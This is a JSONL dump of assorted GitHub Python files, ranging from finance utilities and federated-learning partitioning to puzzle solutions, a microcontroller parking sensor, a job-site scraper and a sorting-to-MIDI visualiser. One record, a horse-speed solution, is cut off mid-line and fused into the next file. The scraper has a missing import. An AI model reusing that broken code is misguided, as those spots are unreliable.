+{"seq_id":"10836879038","text":"import os\nfrom functools import reduce\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\n\nimport pandas as pd\nimport yaml\n\n\n\ndef file_folder_exists(path: str):\n \"\"\"\n Return True if a file or folder exists.\n :param path: the full path to be checked\n :type path: str\n \"\"\"\n try:\n os.stat(path)\n return True\n except:\n return False\n\n\ndef select_or_create(path: str):\n \"\"\"\n Check if a folder exists. If it doesn't, it create the folder.\n :param path: path to be selected\n :type path: str\n \"\"\"\n if not file_folder_exists(path):\n os.makedirs(path)\n return path\n\n\ndef merge_dataframe(data_frames):\n return reduce(lambda left, right: pd.merge(left, right, how=\"outer\"), data_frames)\n\ndef rmse(y_true, y_pred):\n return np.sqrt(mean_squared_error(y_true, y_pred))\n\n\ndef fundamental_indicators(stock):\n score = pd.DataFrame()\n score[\"code\"] = [stock.code]\n score[\"name\"] = [stock.get_info('shortName')]\n score[\"Date\"] = [stock.quot_date]\n \n score[\"Reference Price\"] = [stock.reference_price]\n score[\"Graham Price\"] = [stock.graham_price]\n\n score[\"price_over_graham_number\"] = [stock.reference_price/stock.graham_price]\n score[\"Net current asset per share over price\"] = [stock.net_current_assets_per_share/stock.reference_price]\n\n score[\"PE ratio\"] = [stock.PE]\n score[\"Return On Equity\"] = [stock.ROE]\n score[\"PB ratio\"] = [stock.PB]\n score[\"Tangible PB ratio\"] = [stock.price_to_tangible_book]\n score[\"Return on Assets\"] = [stock.ROA]\n score[\"Dividend yeld\"] = [stock.dividend_yeld]\n score[\"Payout Ratio\"] = [stock.payout_ratio]\n score[\"Quick Ratio\"] = [stock.quick_ratio]\n score[\"Price to cash flow\"] = [stock.price_to_cash_flow]\n score[\"Price to free cash flow\"] = [stock.price_to_free_cash_flow]\n score['Working capital over market cap'] = [stock.working_capital_per_share/stock.reference_price]\n score['Net cash over market cap'] = [stock.net_cash_per_share/stock.reference_price]\n score['EPS over price'] = [stock.EPS/stock.reference_price]\n score['ROCE'] = [stock.ROCE]\n score['Net income per employee'] = [stock.net_income_per_employee]\n score['Revenue per employee'] = [stock.revenue_per_employee]\n return score\n","repo_name":"AlessandroGianfelici/pyInvest","sub_path":"invest/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2067783139","text":"import random\n\nimport numpy as np\nfrom utils.logger import CustomLogger\n\n\nclass PartitioningScheme(object):\n\n\tdef __init__(self, x_train, y_train, partitions_num):\n\t\tself.partitions_num = partitions_num\n\t\tself.x_train = x_train\n\t\tself.y_train = y_train\n\t\tself.iid = False\n\t\tself.non_iid = False\n\t\tself.classes_per_client = 0\n\t\tself.examples_per_client = []\n\n\tdef iid_partition(self):\n\t\tidx = list(range(len(self.x_train)))\n\t\trandom.shuffle(idx)\n\t\tx_train_randomized = self.x_train[idx]\n\t\ty_train_randomized = self.y_train[idx]\n\n\t\tchunk_size = int(len(self.x_train) / self.partitions_num)\n\t\tx_chunk, y_chunk = [], []\n\t\tfor i in range(self.partitions_num):\n\t\t\tx_chunk.append(x_train_randomized[idx[i * chunk_size:(i + 1) * chunk_size]])\n\t\t\ty_chunk.append(y_train_randomized[idx[i * chunk_size:(i + 1) * chunk_size]])\n\t\tx_chunk = np.array(x_chunk)\n\t\ty_chunk = np.array(y_chunk)\n\t\tCustomLogger.info(\"Chunk size {}, {}\".format(x_chunk.shape, y_chunk.shape))\n\n\t\t# set partition object specifications\n\t\tself.iid = True\n\t\tself.classes_per_client = np.unique(y_chunk).size\n\t\tself.examples_per_client = [y_c.size for y_c in y_chunk]\n\n\t\treturn x_chunk, y_chunk\n\n\n\tdef non_iid_partition(self, classes_per_partition=2):\n\n\t\t\"\"\" If the y-data points contain numpy arrays, we need to convert it\n\t\tto a list of values in order for the set/hash to take effect during\n\t\tpartitioning by the y-axis. \"\"\"\n\t\ty_are_ndarrays = False\n\t\tif isinstance(self.y_train[0], np.ndarray):\n\t\t\ty_are_ndarrays = True\n\t\t\ty_converted_values = []\n\t\t\tfor v in self.y_train:\n\t\t\t\ty_converted_values.extend(v.tolist())\n\t\telse:\n\t\t\ty_converted_values = self.y_train\n\n\t\tsorted_data = sorted(zip(self.x_train, y_converted_values), key=lambda pair: pair[1])\n\t\tx_train_sorted = [x for x, y in sorted_data]\n\t\ty_train_sorted = [y for x, y in sorted_data]\n\n\t\t# The number of chunks depends on the number of partitions and number of classes.\n\t\t# If we want one class per client then we split the data into #partitions == #clients\n\t\t# else, if we want k-classes per client then we need to split the data into #partitions * #k-classes\n\t\tchunk_size = int(len(self.x_train) / (self.partitions_num * classes_per_partition))\n\n\t\tx_chunks = [x_train_sorted[i:i+chunk_size] for i in range(0, len(x_train_sorted), chunk_size)]\n\t\ty_chunks = [y_train_sorted[i:i+chunk_size] for i in range(0, len(y_train_sorted), chunk_size)]\n\n\t\tx_chunks_all_clients, y_chunks_all_clients = [], []\n\t\tassigned_chunks = dict()\n\t\tfor pidx in range(self.partitions_num):\n\t\t\tassigned_classes = 0\n\t\t\tindexes_to_remove = []\n\t\t\tx_chunks_single_client, y_chunks_single_client = [], []\n\t\t\tfor chunk_idx, y_chunk in enumerate(y_chunks):\n\t\t\t\tif assigned_classes < classes_per_partition:\n\t\t\t\t\t# Make sure that there is no overlap between classes.\n\t\t\t\t\tif len(set(y_chunks_single_client).intersection(set(y_chunk))) == 0:\n\t\t\t\t\t\ty_chunks_single_client.extend(y_chunk)\n\t\t\t\t\t\tx_chunks_single_client.extend(x_chunks[chunk_idx])\n\t\t\t\t\t\tassigned_chunks[chunk_idx] = True\n\t\t\t\t\t\tassigned_classes += 1\n\t\t\t\t\t\tindexes_to_remove.append(chunk_idx)\n\t\t\t\telse:\n\t\t\t\t\t# If limit of assigned classes is reached then exit.\n\t\t\t\t\tbreak\n\t\t\tx_chunks_all_clients.append(x_chunks_single_client)\n\t\t\ty_chunks_all_clients.append(y_chunks_single_client)\n\n\t\t\tfor position, idx in enumerate(indexes_to_remove):\n\t\t\t\tdel x_chunks[idx-position]\n\t\t\t\tdel y_chunks[idx-position]\n\n\t\tx_chunk = np.array(x_chunks_all_clients)\n\n\t\t\"\"\" Bring the format of the y-values back to their original numpy array format. \"\"\"\n\t\tif y_are_ndarrays:\n\t\t\tfor idx, y_chunk in enumerate(y_chunks_all_clients):\n\t\t\t\ty_chunks_all_clients[idx] = [np.array(y) for y in y_chunk]\n\n\t\ty_chunk = np.array(y_chunks_all_clients)\n\t\tCustomLogger.info(\"Chunk size {}. X-attribute shape: {}, Y-attribute shape: {}\".format(\n\t\t\tchunk_size, x_chunk.shape, y_chunk.shape))\n\t\tremaining = len(y_chunks)\n\t\tCustomLogger.info(\"Remaining unassigned data points: {}\".format(len(y_chunks)))\n\t\tif remaining > 0:\n\t\t\traise RuntimeError(\"Not all training data have been assigned.\")\n\n\t\t# set partition object specifications\n\t\tself.non_iid = True\n\t\tself.classes_per_client = classes_per_partition\n\t\tself.examples_per_client = [y_c.size for y_c in y_chunk]\n\n\t\treturn x_chunk, y_chunk\n\n\n\tdef dirichlet_based_partition(self, a):\n\t\tpass\n\n\n\tdef to_json_representation(self):\n\t\treturn {'iid': self.iid,\n\t\t\t\t'non_iid': self.non_iid,\n\t\t\t\t'classes_per_client': self.classes_per_client,\n\t\t\t\t'examples_per_client': self.examples_per_client}\n","repo_name":"dstripelis/FedSparsify","sub_path":"utils/data_distribution.py","file_name":"data_distribution.py","file_ext":"py","file_size_in_byte":4436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23577873171","text":"\r\n\r\ndef bestSpeed(horses,D):\r\n minSpeed=10**20\r\n for h in horses:\r\n if h[0] bool:\n goal = len(nums) - 1\n for i in range(len(nums) - 1, -1, -1):\n if nums[i] + i >= goal:\n goal = i\n return goal == 0","repo_name":"victordacamino/LeetHub","sub_path":"0055-jump-game/0055-jump-game.py","file_name":"0055-jump-game.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74752667715","text":"import time\nimport board\nimport adafruit_hcsr04\nimport digitalio\nimport pulseio\nimport sys\n\n# This is the State Machine class that will be inherited from the main one\nclass SM:\n def start(self):\n self.state = self.startState\n def step(self, inp):\n (s, o) = self.getNextValues(self.state, inp)\n self.state = s\n return o\n def transduce(self, inputs):\n self.start()\n return [self.step(inp) for inp in inputs]\n\n# This is the class where we built our own class inheriting State Machine class\nclass ParkAssistant(SM):\n state = \"\"\n def __init__(self):\n # defining each item that belongs to our class\n self.timer = 0 # local variable as counter\n self.greenLED = digitalio.DigitalInOut(board.D10) # Green LED\n self.redLED = digitalio.DigitalInOut(board.D11) # Red LED\n self.yellowLED = digitalio.DigitalInOut(board.D12) # Yellow LED\n # Opening Ceremony\n for led in [self.greenLED, self.yellowLED, self.redLED]:\n led.direction = digitalio.Direction.OUTPUT\n led.value = True\n time.sleep(2)\n led.value = False\n time.sleep(1)\n self.buzzer = pulseio.PWMOut(board.D13, variable_frequency=True) # Buffer initiated\n # Buffer attributes - Start\n self.buzzer.frequency = 440\n self.OFF = 0\n self.ON = 2 ** 15\n # Buffer attributes - End\n self.buzzer.duty_cycle = self.ON # Turn on the buzzer\n time.sleep(1)\n self.buzzer.duty_cycle = self.OFF # Turn off the buzzer\n self.sonar = adafruit_hcsr04.HCSR04(trigger_pin=board.D4, echo_pin=board.D2) # Sensor placement on board\n\n print(\"Obstacle Detector Device is Working\")\n\n def getNextValues(self, state, inp):\n self.inp = inp\n self.state = state #\n self.turnOffLEDs() # Turning off the LEDs\n # Conditions are made here to warn the driver\n if inp > 120 and inp < 200:\n self.greenLED.value = True\n return \"You are Safe\", inp\n elif inp > 50 and inp <= 120:\n self.yellowLED.value = True\n return \"Slow Down Your Speed\", inp \n elif inp > 25 and inp <= 50:\n self.redLED.value = True\n return \"DANGER TOO CLOSE\", inp\n elif inp >= 200:\n self.greenLED.value = True\n self.yellowLED.value = True\n return 'Distance Error', inp\n elif inp <= 25:\n self.redLED.value = True\n self.buzzer.duty_cycle = self.ON\n self.timer += 1\n if self.timer >= 5:\n self.shutdown()\n return \"Warning!\", inp\n \n # This function is made to turn off LEDs at a moment\n def turnOffLEDs(self):\n self.redLED.value = False\n self.greenLED.value = False\n self.yellowLED.value = False\n\n # This function is made to check \n def VolumeControl(self):\n \"\"\" You can open commants to obtain dynamic frequency changing \"\"\"\n \n# if self.state == \"You are Safe\" or self.inp >= 120:\n# self.buzzer.duty_cycle = self.OFF\n# return\n\n# if self.state != \"Warning!\":\n# self.timer = 0\n \n# self.buzzer.duty_cycle = self.ON\n# frequency = 440-self.inp*4\n# if frequency <= 0: frequency = 1\n# self.buzzer.frequency = frequency\n if self.state != \"Warning!\": \n self.buzzer.duty_cycle = self.OFF\n self.timer = 0\n\n # This is the function that starts the whole application\n def startParking(self):\n while True:\n try:\n print(\"{}: {}\".format(self.step(int(self.sonar.distance)), self.state))\n self.VolumeControl()\n except RuntimeError:\n print('Distance Error')\n time.sleep(0.5)\n # This is the function that will stop the whole system at a moment.\n def shutdown(self):\n print(\"The Device Stopped! Calling the emergency services\")\n sys.exit()\n\nparkAssistant = ParkAssistant() # Forming the instance\nparkAssistant.startParking() # Starting the application\n","repo_name":"alperdokay/EECS-201-Final-Project","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7769940160","text":"text = {\n 'China' : ['中国','No.1'],\n 'America' : ['美国','No.2'],\n 'Japan' : ['日本','No.3'],\n 'India' : ['印度','No.4']\n}\n\n'''\n\n#这三种要用for去遍历\n\nprint((text.keys())) #打印键名(带字典名)\n\nprint((text.values())) #打印键值(带字典名)\n\nprint((text.items())) #打印元素(带字典名)\n\n'''\n\n\n'''\n\nfor i in text.keys(): #打印键名\n print(i)\n\nfor i in text.values(): #打印键值\n print(i)\n\nfor i in text.items(): #打印元素\n print(i)\n\n'''","repo_name":"AmanoRenard/Python","sub_path":"学习/字典.py","file_name":"字典.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72330806915","text":"import requests\nfrom bs4 import BeautifulSoup\n\nfrom main_module.sites.Jobs import Jobs\n\ninit_url = \"https://www.linkedin.com/jobs/search/?&location=Worldwide&sortBy=DD\"\n\n\nclass Linkedin(Jobs):\n def __init__(self, url=init_url, item_count=30, page_item_number=24):\n self.page_item_number = page_item_number\n super().__init__(url, item_count, page_item_number)\n\n def get_page_result(self):\n page_results = []\n for page in self.rang:\n try:\n response = requests.get(\n self.url + f\"&start={page * self.page_item_number}\" if page != 1 else self.url,\n headers={\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0\",\n \"Host\": \"www.linkedin.com\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Connection\": \"keep-alive\",\n \"Upgrade-Insecure-Requests\": \"1\"\n }\n )\n except requests.exceptions.RequestException as e: # This is the correct syntax\n raise self.RequestException(e)\n soup = BeautifulSoup(response.content, \"html.parser\")\n result = (\n soup.findAll(\"div\", attrs={\n \"class\": \"base-card\"})\n [:self.last_page_item]\n if len(self.rang) == page\n else soup.findAll(\"div\", class_=\"base-card\")\n )\n page_results.append(result)\n return page_results\n\n def get_job_results(self, page_results):\n for page in page_results:\n for item in page[::-1]:\n link_element = item.find(\"a\", class_=\"c-jobListView__titleLink\")\n link = link_element.get(\"href\")\n title = link_element.text.strip()\n time = item.find(\"span\", class_=\"c-jobListView__passedDays\")\n image = item.find(\"img\", class_=\"o-listView__itemIndicatorImage\")\n match = re.search(self.image_regex, image[\"src\"])\n image_link = None\n if match:\n image_link = match.group()\n date = self.generate_item_date(time)\n self.job_results.append({\n \"title\": title,\n \"published_at\": date,\n \"image\": image_link,\n \"link\": link\n })\n","repo_name":"amirdks/web_scraping_project","sub_path":"main_module/sites/linkedin.py","file_name":"linkedin.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29379718851","text":"# For `anyconfig.open`:\n# pylint: disable=redefined-builtin\nr\"\"\"\n.. module:: anyconfig\n :platform: Unix, Windows\n :synopsis: Generic interface to loaders for various config file formats.\n\npython-anyconfig is a `MIT licensed `_\npython library provides common APIs to access to configuration files in various\nformats with some useful features such as contents merge, templates and schema\nvalidation/generation support.\n\n- Home: https://github.com/ssato/python-anyconfig\n- (Latest) Doc: http://python-anyconfig.readthedocs.org/en/latest/\n- PyPI: https://pypi.python.org/pypi/anyconfig\n- Copr RPM repos: https://copr.fedoraproject.org/coprs/ssato/python-anyconfig/\n\n\"\"\"\nfrom .globals import AUTHOR, VERSION\nfrom .api import (\n single_load, multi_load, load, loads, dump, dumps, validate, gen_schema,\n list_types, find_loader, merge, get, set_, open,\n MS_REPLACE, MS_NO_REPLACE, MS_DICTS, MS_DICTS_AND_LISTS,\n UnknownParserTypeError, UnknownFileTypeError\n)\n\n__author__ = AUTHOR\n__version__ = VERSION\n\n__all__ = [\n \"single_load\", \"multi_load\", \"load\", \"loads\", \"dump\", \"dumps\", \"validate\",\n \"gen_schema\", \"list_types\", \"find_loader\", \"merge\",\n \"get\", \"set_\", \"open\",\n \"MS_REPLACE\", \"MS_NO_REPLACE\", \"MS_DICTS\", \"MS_DICTS_AND_LISTS\",\n \"UnknownParserTypeError\", \"UnknownFileTypeError\"\n]\n\n# vim:sw=4:ts=4:et:\n","repo_name":"amitvashist7/ansible-development-CTS","sub_path":"molecule/my_env/lib/python2.7/site-packages/anyconfig/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"22946748003","text":"\nfrom vsg import token\n\nfrom vsg.rules import move_token_left_to_next_non_whitespace_token as Rule\n\nlTokens = []\nlTokens.append(token.concurrent_selected_signal_assignment.select_keyword)\nlTokens.append(token.selected_force_assignment.select_keyword)\nlTokens.append(token.selected_variable_assignment.select_keyword)\nlTokens.append(token.selected_waveform_assignment.select_keyword)\n\n\nclass rule_002(Rule):\n '''\n This rule checks the **select** keyword is on the same line as the expression.\n\n **Violation**\n\n .. code-block:: vhdl\n\n with mux_sel\n select addr <=\n \"0000\" when 0,\n \"0001\" when 1,\n \"1111\" when others;\n\n **Fix**\n\n .. code-block:: vhdl\n\n with mux_sel select addr <=\n \"0000\" when 0,\n \"0001\" when 1,\n \"1111\" when others;\n '''\n\n def __init__(self):\n Rule.__init__(self, 'selected_assignment', '002', lTokens)\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/rules/selected_assignment/rule_002.py","file_name":"rule_002.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"} +{"seq_id":"34924863393","text":"import math\nimport sys\n\nmoons = []\nfor l in sys.stdin:\n moons.append([int(e.split('=')[1]) for e in l.strip()[1:-1].split(',')])\n\ndef sim(pos, steps):\n vel = [[0, 0, 0] for _ in range(len(pos))]\n\n for _ in range(steps):\n for p, v in zip(pos, vel):\n for o in pos:\n for i in range(len(p)):\n if p[i] > o[i]:\n v[i] -= 1\n elif p[i] < o[i]:\n v[i] += 1\n\n for p, v in zip(pos, vel):\n for i in range(len(p)):\n p[i] += v[i]\n\n return pos, vel\n\npos, vel = sim([m[:] for m in moons], 1000)\nprint(sum([sum([abs(v) for v in p]) * sum([abs(v) for v in vel[i]]) for i, p in enumerate(pos)]))\n\ncycles = []\nfor i in range(3):\n c = 0\n initial_pos = [p[i] for p in moons]\n initial_vel= [0 for _ in range(len(pos))]\n pos = [m[i] for m in moons]\n vel = initial_vel[:]\n\n while True:\n for j in range(len(pos)):\n for o in pos:\n if pos[j] > o:\n vel[j] -= 1\n elif pos[j] < o:\n vel[j] += 1\n\n for j in range(len(pos)):\n pos[j] += vel[j]\n\n c += 1\n if pos == initial_pos and vel == initial_vel:\n break\n cycles.append(c)\n\nprint(math.lcm(*cycles))\n","repo_name":"xilefsensei/adventofcode","sub_path":"19/12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23140115900","text":"from copy import deepcopy\nimport itertools as it\nimport math\nfrom random import randint\nimport subprocess\nfrom typing import Tuple\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport mido\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom env import Env\nfrom env.events import *\n\nDEFAULT_BPM = 120\nDEFAULT_TICKS_PER_BEAT = 480\nTIMIDITY = 'timidity.exe'\n\n\ndef generate_audio(env: Env, bpm=DEFAULT_BPM, ticks_per_beat=DEFAULT_TICKS_PER_BEAT, filename='audio.wav'):\n\tenv = deepcopy(env)\n\ttempo = mido.bpm2tempo(bpm)\n\n\tblocks = env.mem.blocks\n\tevents = env.events\n\t[e.revert() for e in events[::-1]]\n\n\tmid = mido.MidiFile(ticks_per_beat=ticks_per_beat)\n\ttrack = mid.add_track()\n\n\ttrack.append(mido.MetaMessage('set_tempo', tempo=tempo))\n\n\tINSTRUMENTS = [randint(0, 127) for _ in range(len(blocks))]\n\tprint('INSTRUMENTS:', INSTRUMENTS)\n\tblock2ch = {b: 2*i for i, b in enumerate(blocks)}\n\tfor ch, ins in zip(block2ch.values(), INSTRUMENTS):\n\t\ttrack.append(mido.Message('program_change', channel=ch, program=ins))\n\t\ttrack.append(mido.Message('control_change', channel=ch, control=10, value=0))\n\t\ttrack.append(mido.Message('program_change', channel=ch+1, program=ins))\n\t\ttrack.append(mido.Message('control_change', channel=ch+1, control=10, value=127))\n\ttrack.append(mido.Message('sysex', data=[], time=events[0].time))\n\n\tOCTAVE_NOTES = [1,0,1,0,1,1,0,1,0,1,0,1] # major scale 'ttsttts'\n\tnote_map = [i for i, x in enumerate(it.islice(it.cycle(OCTAVE_NOTES), 128)) if x and 20 < i < 109]\n\n\tdef to_note(addr: Addr, mode: str) -> Tuple[int, int]:\n\t\tch = block2ch[addr.block]\n\t\tif mode == 'w':\n\t\t\tch += 1\n\t\telif mode != 'r':\n\t\t\traise Exception\n\n\t\treturn ch, note_map[addr.offset + (len(note_map) - len(addr)) // 2]\n\n\tfor i, ev in enumerate(events):\n\t\tif isinstance(ev, EventCmp):\n\t\t\tops = [(ev.addr1, 'r'), (ev.addr2, 'r')]\n\t\telif isinstance(ev, EventSwap):\n\t\t\tops = [(ev.addr1, 'w'), (ev.addr2, 'w')]\n\t\telif isinstance(ev, EventMov):\n\t\t\tops = [(ev.dst, 'w'), (ev.src, 'r')]\n\t\telif isinstance(ev, EventEnd):\n\t\t\tbreak\n\t\telse:\n\t\t\traise Exception\n\n\t\tfor addr, mode in ops:\n\t\t\tch, note = to_note(addr, mode)\n\t\t\ttrack.append(mido.Message('note_on', channel=ch, note=note))\n\t\ttrack.append(mido.Message('sysex', data=[], time=events[i+1].time - ev.time))\n\t\tfor addr, mode in ops:\n\t\t\tch, note = to_note(addr, mode)\n\t\t\ttrack.append(mido.Message('note_off', channel=ch, note=note))\n\n\tmidi_outfile = filename.rsplit('.', maxsplit=1)[0] + '.mid'\n\tmid.save(midi_outfile)\n\n\tsubprocess.run([\n\t\tTIMIDITY,\n\t\t'--preserve-silence',\n\t\t'-c', 'timidity_config.cfg',\n\t\t'--voice-lpf=d',\n\t\tmidi_outfile,\n\t\t'-OwS',\n\t\t'-o', filename\n\t])\n\ndef generate_animation(env: Env, start_delay, title='', bpm=DEFAULT_BPM, ticks_per_beat=DEFAULT_TICKS_PER_BEAT, filename='anim.mp4', figsize=(12.80,7.20)):\n\tCOLOR_IDLE = 'white'\n\tCOLORS_CMP = ['limegreen'] * 2\n\tCOLORS_SWAP = ['red'] * 2\n\tCOLORS_MOV = ['red', 'limegreen']\n\tFPS = 30\n\tTIMEWINDOW = 2\n\n\tenv = deepcopy(env)\n\ttempo = mido.bpm2tempo(bpm)\n\n\tblocks = env.mem.blocks\n\tevents = env.events\n\t[e.revert() for e in events[::-1]]\n\n\tplt.style.use('dark_background')\n\tfig, (arr_axs, midi_axs) = plt.subplots(2, len(blocks), sharey='row', sharex='col', squeeze=False,\n\t gridspec_kw={\n\t\t 'width_ratios': [len(b) for b in blocks],\n\t\t 'wspace': 0,\n\t\t 'height_ratios': [1, 2],\n\t\t 'hspace': 0\n\t }, figsize=figsize)\n\tfor ax in it.chain(arr_axs, midi_axs):\n\t\tax.tick_params(which='both',\n\t\t bottom=False, top=False, left=False, right=False,\n\t\t labelbottom=False, labeltop=False, labelleft=False, labelright=False)\n\tfig.tight_layout(rect=[0,0,1,0.95])\n\tbars = {block: ax.bar(range(len(block)), block, width=1, color=COLOR_IDLE, edgecolor='black')\n\t for ax, block in zip(arr_axs, blocks)}\n\n\t# Generate note bars\n\tfor ax, block in zip(midi_axs, blocks):\n\t\tax.set_ylim(-start_delay + TIMEWINDOW, start_delay)\n\n\t\txs = []\n\t\theights = []\n\t\tbottoms = []\n\t\tcolors = []\n\n\t\tfor i, ev in enumerate(events):\n\t\t\tif isinstance(ev, EventEnd):\n\t\t\t\tcontinue\n\n\t\t\tev2 = events[i+1]\n\t\t\theight = mido.tick2second(ev2.time - ev.time, ticks_per_beat, tempo)\n\t\t\tbottom = mido.tick2second(ev.time, ticks_per_beat, tempo)\n\t\t\tif isinstance(ev, EventCmp):\n\t\t\t\taddr = [ev.addr1, ev.addr2]\n\t\t\t\tcolor = COLORS_CMP\n\t\t\telif isinstance(ev, EventSwap):\n\t\t\t\taddr = [ev.addr1, ev.addr2]\n\t\t\t\tcolor = COLORS_SWAP\n\t\t\telif isinstance(ev, EventMov):\n\t\t\t\taddr = [ev.dst, ev.src]\n\t\t\t\tcolor = COLORS_MOV\n\t\t\telse:\n\t\t\t\traise ValueError\n\n\t\t\tfor j in range(len(addr)):\n\t\t\t\ta = addr[j]\n\t\t\t\tif a.block is block:\n\t\t\t\t\txs.append(a.offset)\n\t\t\t\t\theights.append(height)\n\t\t\t\t\tbottoms.append(bottom)\n\t\t\t\t\tcolors.append(color[j])\n\n\t\tax.bar(xs, heights, width=1, bottom=bottoms, color=colors, edgecolor='black')\n\n\n\tcmps = swaps = movs = total = 0\n\tdef title_fmt():\n\t\treturn f'{title}\\nSize:{len(env.arr)} -- Cmps:{cmps} -- Swaps:{swaps} -- Movs:{movs} -- Total:{total}'\n\n\tend_time_s = mido.tick2second(events[-1].time, ticks_per_beat, tempo)\n\ttotal_frames = math.ceil((end_time_s + start_delay) * 30)\n\tframe_times = np.linspace(-start_delay, end_time_s, total_frames)\n\tpbar = tqdm(total=total_frames)\n\n\tprev_bars = []\n\trevents = events[::-1]\n\n\tdef init():\n\t\tfig.suptitle(title_fmt())\n\t\treturn []\n\n\tdef update(t):\n\t\tnonlocal prev_bars, cmps, swaps, movs, total\n\n\t\tpbar.update()\n\n\t\tfig.suptitle(title_fmt())\n\n\t\tfor ax in midi_axs:\n\t\t\tax.set_ylim(t + TIMEWINDOW, t)\n\n\t\tret = []\n\t\tif t >= mido.tick2second(revents[-1].time, ticks_per_beat, tempo):\n\t\t\tevent = revents.pop()\n\n\t\t\tfor bar in prev_bars:\n\t\t\t\tbar.set_facecolor(COLOR_IDLE)\n\t\t\t\tret.append(bar)\n\t\t\tprev_bars = []\n\n\t\t\tevent.apply()\n\n\t\t\tif isinstance(event, EventCmp):\n\t\t\t\tcmps += 1\n\t\t\t\tcolors = COLORS_CMP\n\t\t\t\taddrs = [event.addr1, event.addr2]\n\t\t\telif isinstance(event, EventSwap):\n\t\t\t\tswaps += 1\n\t\t\t\tcolors = COLORS_SWAP\n\t\t\t\taddrs = [event.addr1, event.addr2]\n\t\t\telif isinstance(event, EventMov):\n\t\t\t\tmovs += 1\n\t\t\t\tcolors = COLORS_MOV\n\t\t\t\taddrs = [event.dst, event.src]\n\t\t\telif isinstance(event, EventEnd):\n\t\t\t\treturn []\n\t\t\telse:\n\t\t\t\traise Exception\n\t\t\ttotal += 1\n\n\t\t\tfor addr, color in zip(addrs, colors):\n\t\t\t\tbar = bars[addr.block][addr.offset]\n\t\t\t\tbar.set_height(addr.get())\n\t\t\t\tbar.set_facecolor(color)\n\t\t\t\tprev_bars.append(bar)\n\t\t\t\tret.append(bar)\n\n\t\treturn ret\n\n\tani = FuncAnimation(fig, update, frames=frame_times, init_func=init,\n\t interval=1000/FPS, repeat=False)\n\tani.save(filename)\n\tpbar.close()\n\n\ndef animate_bars(env: Env):\n\tCOLOR_IDLE = 'white'\n\tCOLORS_CMP = ['limegreen'] * 2\n\tCOLORS_SWAP = ['red'] * 2\n\tCOLORS_MOV = ['red', 'limegreen']\n\n\tenv = deepcopy(env)\n\n\tblocks = env.mem.blocks\n\tevents = env.events\n\t[e.revert() for e in events[::-1]]\n\n\tplt.style.use('dark_background')\n\tfig, (axs,) = plt.subplots(1, len(blocks), sharey=True, squeeze=False,\n\t gridspec_kw={\n\t\t 'width_ratios': [len(b) for b in blocks],\n\t\t 'wspace': 0,\n\t })\n\tfor ax in axs:\n\t\tax.spines['top'].set_visible(False)\n\t\tax.tick_params(which='both',\n\t\t bottom=False, top=False, left=False, right=False,\n\t\t labelbottom=False, labeltop=False, labelleft=False, labelright=False)\n\tfig.tight_layout(pad=0, rect=[0, 0, 1, 0.95])\n\tbars = {block: ax.bar(range(len(block)), block, width=1, color=COLOR_IDLE, edgecolor='black', linewidth=0.5)\n\t for ax, block in zip(axs, blocks)}\n\n\tcmps = swaps = movs = total = 0\n\tdef title_fmt():\n\t\treturn f'Cmps:{cmps} -- Swaps:{swaps} -- Movs:{movs} -- Total:{total}'\n\n\tprev_bars = []\n\n\tdef init():\n\t\tfig.suptitle(title_fmt())\n\t\treturn []\n\n\tdef update(event: Event):\n\t\tnonlocal prev_bars, cmps, swaps, movs, total\n\n\t\tfig.suptitle(title_fmt())\n\n\t\tret = []\n\n\t\tfor bar in prev_bars:\n\t\t\tbar.set_facecolor(COLOR_IDLE)\n\t\t\tret.append(bar)\n\t\tprev_bars = []\n\n\t\tevent.apply()\n\n\t\tif isinstance(event, EventCmp):\n\t\t\tcmps += 1\n\t\t\tcolors = COLORS_CMP\n\t\t\taddrs = [event.addr1, event.addr2]\n\t\telif isinstance(event, EventSwap):\n\t\t\tswaps += 1\n\t\t\tcolors = COLORS_SWAP\n\t\t\taddrs = [event.addr1, event.addr2]\n\t\telif isinstance(event, EventMov):\n\t\t\tmovs += 1\n\t\t\tcolors = COLORS_MOV\n\t\t\taddrs = [event.dst, event.src]\n\t\telif isinstance(event, EventEnd):\n\t\t\treturn []\n\t\telse:\n\t\t\traise Exception\n\t\ttotal += 1\n\n\t\tfor addr, color in zip(addrs, colors):\n\t\t\tbar = bars[addr.block][addr.offset]\n\t\t\tbar.set_height(addr.get())\n\t\t\tbar.set_facecolor(color)\n\t\t\tprev_bars.append(bar)\n\t\t\tret.append(bar)\n\n\t\treturn ret\n\n\tani = FuncAnimation(fig, update, frames=events, init_func=init, interval=1000/10, 